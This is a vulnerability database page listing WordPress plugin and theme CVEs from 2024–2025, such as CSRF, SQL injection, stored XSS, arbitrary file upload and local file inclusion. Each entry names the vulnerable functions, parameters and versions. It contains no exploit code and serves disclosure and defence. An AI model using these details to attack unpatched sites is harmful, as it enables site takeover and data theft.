Live Vulnerability Intelligence
Threat Database
Search CVEs, inspect descriptions, and open detail pages with AI-assisted technical context.
Threat Entry
Updated 2025-05-12
CVE-2025-2168 - Ultimate Store Kit Plugin
The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.4.1. This is due to missing or incorrect nonce validation on the dismiss() function. This makes it possible for unauthenticated attackers to set arbitrary user meta values to `1` which can be leveraged to lock and administrator out of their site via a forged request granted they can trick a site administrator into performing an…
PLUGIN
Ultimate Store Kit
CVE-2025-2168
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-1305 - Newsblogger Plugin
The NewsBlogger theme for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.2.5.4. This is due to missing or incorrect nonce validation on the newsblogger_install_and_activate_plugin() function. This makes it possible for unauthenticated attackers to upload arbitrary files and achieve remote code execution via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
PLUGIN
Newsblogger
CVE-2025-1305
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-1304 - Newsblogger Plugin
The NewsBlogger theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the newsblogger_install_and_activate_plugin() function in all versions up to, and including, 0.2.5.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
PLUGIN
Newsblogger
CVE-2025-1304
Risk Score
Threat Entry
Updated 2025-05-12
CVE-2025-2816 - Page View Count Plugin
The Page View Count plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the yellow_message_dontshow() function in versions 2.8.0 to 2.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to one on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true…
PLUGIN
Page View Count
CVE-2025-2816
Risk Score
Threat Entry
Updated 2025-05-02
CVE-2025-2890 - Tagdiv Opt In Builder Plugin
The tagDiv Opt-In Builder plugin for WordPress is vulnerable to time-based SQL Injection via the ‘subscriptionCouponId’ parameter in all versions up to, and including, 1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
PLUGIN
Tagdiv Opt In Builder
CVE-2025-2890
Risk Score
Threat Entry
Updated 2025-05-02
CVE-2025-3953 - Most Popular Privacy Friendly Analytics Plugin
The WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'optionUpdater' function in all versions up to, and including, 14.13.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin settings.
PLUGIN
Most Popular Privacy Friendly Analytics
CVE-2025-3953
Risk Score
Threat Entry
Updated 2025-05-09
CVE-2025-3471 - Before 1 Plugin
The SureForms WordPress plugin before 1.4.4 does not have proper authorisation check when updating its settings via the REST API, which could allow Contributor and above roles to perform such action
PLUGIN
Before 1
CVE-2025-3471
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-3452 - Secupress Plugin
The SecuPress Free — WordPress Security plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'secupress_reinstall_plugins_admin_ajax_cb' function in all versions up to, and including, 2.3.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins.
PLUGIN
Secupress
CVE-2025-3452
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-2893 - Gutenverse Plugin
The Gutenverse – Ultimate Block Addons and Page Builder for Site Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's countdown Block in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
PLUGIN
Gutenverse
CVE-2025-2893
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2024-12273 - Calculated Fields Form Plugin
The Calculated Fields Form WordPress plugin before 5.2.62 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
PLUGIN
Calculated Fields Form
CVE-2024-12273
Risk Score
Threat Entry
Updated 2025-04-30
CVE-2025-0627 - And Taxonomy Manager Plugin
The WordPress Tag, Category, and Taxonomy Manager WordPress plugin before 3.30.0 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
PLUGIN
And Taxonomy Manager
CVE-2025-0627
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2024-9771 - Before 16 Plugin
The WP-Recall WordPress plugin before 16.26.12 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
PLUGIN
Before 16
CVE-2024-9771
Risk Score
Threat Entry
Updated 2025-05-14
CVE-2024-13688 - Before 7 Plugin
The Admin and Site Enhancements (ASE) WordPress plugin before 7.6.10 uses a hardcoded password in its Password Protection feature, allowing attacker to bypass the protection offered via a crafted request
PLUGIN
Before 7
CVE-2024-13688
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2025-2101 - Edumall Theme
The Edumall theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.4 via the 'template' parameter of the 'edumall_lazy_load_template' AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.
THEME
Edumall
CVE-2025-2101
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2024-13812 - The Anps Theme Plugin
The The Anps Theme plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
PLUGIN
The Anps Theme
CVE-2024-13812
Risk Score
Threat Entry
Updated 2025-05-14
CVE-2025-2907 - Order Delivery Date Plugin
The Order Delivery Date WordPress plugin before 12.3.1 does not have authorization and CSRF checks when importing settings. Furthermore it also lacks proper checks to only update options relevant to the Order Delivery Date WordPress plugin before 12.3.1. This leads to attackers being able to modify the default_user_role to administrator and users_can_register, allowing them to register as an administrator of the site for complete site takeover.
PLUGIN
Order Delivery Date
CVE-2025-2907
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-3914 - Aeropage Sync For Airtable Plugin
The Aeropage Sync for Airtable plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'aeropage_media_downloader' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.
PLUGIN
Aeropage Sync For Airtable
CVE-2025-3914
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2025-3906 - Integracao Entre Eduzz E Wc Powers Plugin
The Integração entre Eduzz e Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wep_opcoes' function in all versions up to, and including, 1.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit the default registration role within the plugin's registration flow to Administrator, which allows any user to create an Administrator account.
PLUGIN
Integracao Entre Eduzz E Wc Powers
CVE-2025-3906
Risk Score
Threat Entry
Updated 2025-04-29
CVE-2025-3491 - Add Custom Page Template Plugin
The Add custom page template plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.0.1 via the 'acpt_validate_setting' function. This is due to insufficient sanitization of the 'template_name' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.
PLUGIN
Add Custom Page Template
CVE-2025-3491
Risk Score
Threat Entry
Updated 2025-05-06
CVE-2025-3915 - Aeropage Sync For Airtable Plugin
The Aeropage Sync for Airtable plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'aeropageDeletePost' function in all versions up to, and including, 3.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.
PLUGIN
Aeropage Sync For Airtable
CVE-2025-3915
Risk Score